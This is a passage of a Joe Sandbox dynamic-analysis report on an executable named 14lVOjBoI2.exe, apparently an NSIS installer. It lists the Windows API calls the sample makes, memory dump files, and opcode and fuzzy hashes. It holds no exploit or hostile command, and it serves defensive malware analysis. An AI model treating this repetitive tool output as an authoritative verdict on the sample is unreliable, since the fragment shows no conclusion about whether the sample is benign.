                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1849352358-0
                                                                                                          • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                          • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                          • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                          • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                          • wsprintfW.USER32 ref: 00404A1A
                                                                                                          • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                          • String ID: %u.%u%s%s
                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                          • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                          • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                          • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                          • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Timeout
                                                                                                          • String ID: !
                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                          • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                          • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                          • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                          • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID: Call
                                                                                                          • API String ID: 3677997916-1824292864
                                                                                                          • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                          • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                          • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                          • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 2659869361-297319885
                                                                                                          • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                          • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                          • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                          • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                          APIs
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,76F923A0), ref: 0040520F
                                                                                                            • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                            • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 3585118688-0
                                                                                                          • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                          • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                          • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                          • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                          • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 2102729457-0
                                                                                                          • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                          • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                          • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                          • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\14lVOjBoI2.exe"), ref: 00405AC2
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                          • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\14lVOjBoI2.exe"), ref: 00405B6A
                                                                                                          • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 3248276644-297319885
                                                                                                          • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                          • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                          • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                          • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                          APIs
                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                          • lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                          • wsprintfW.USER32 ref: 100015F2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2128913504.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2128848115.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2128967473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2129045974.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocGloballstrcpywsprintf
                                                                                                          • String ID: s<u
                                                                                                          • API String ID: 2689062267-779365171
                                                                                                          • Opcode ID: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
                                                                                                          • Instruction ID: d9a8518b4a308c4ae7950fd45204b89885c5383cf9e926244676a8cd36a9aa9c
                                                                                                          • Opcode Fuzzy Hash: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
                                                                                                          • Instruction Fuzzy Hash: 68E02070205C21E7F121D7249C88ACD37F4EF812E77124124F706EA18CDB31CA434785
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                          • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                          Strings
                                                                                                          • Error launching installer, xrefs: 00405748
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                          • String ID: Error launching installer
                                                                                                          • API String ID: 3712363035-66219284
                                                                                                          • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                          • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                          • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                          • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(?,76F93420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 1100898210-297319885
                                                                                                          • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                          • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                          • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                          • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\14lVOjBoI2.exe,C:\Users\user\Desktop\14lVOjBoI2.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\14lVOjBoI2.exe,C:\Users\user\Desktop\14lVOjBoI2.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharPrevlstrlen
                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                          • API String ID: 2709904686-2743851969
                                                                                                          • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                          • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                          • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                          • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                          Memory Dump Source
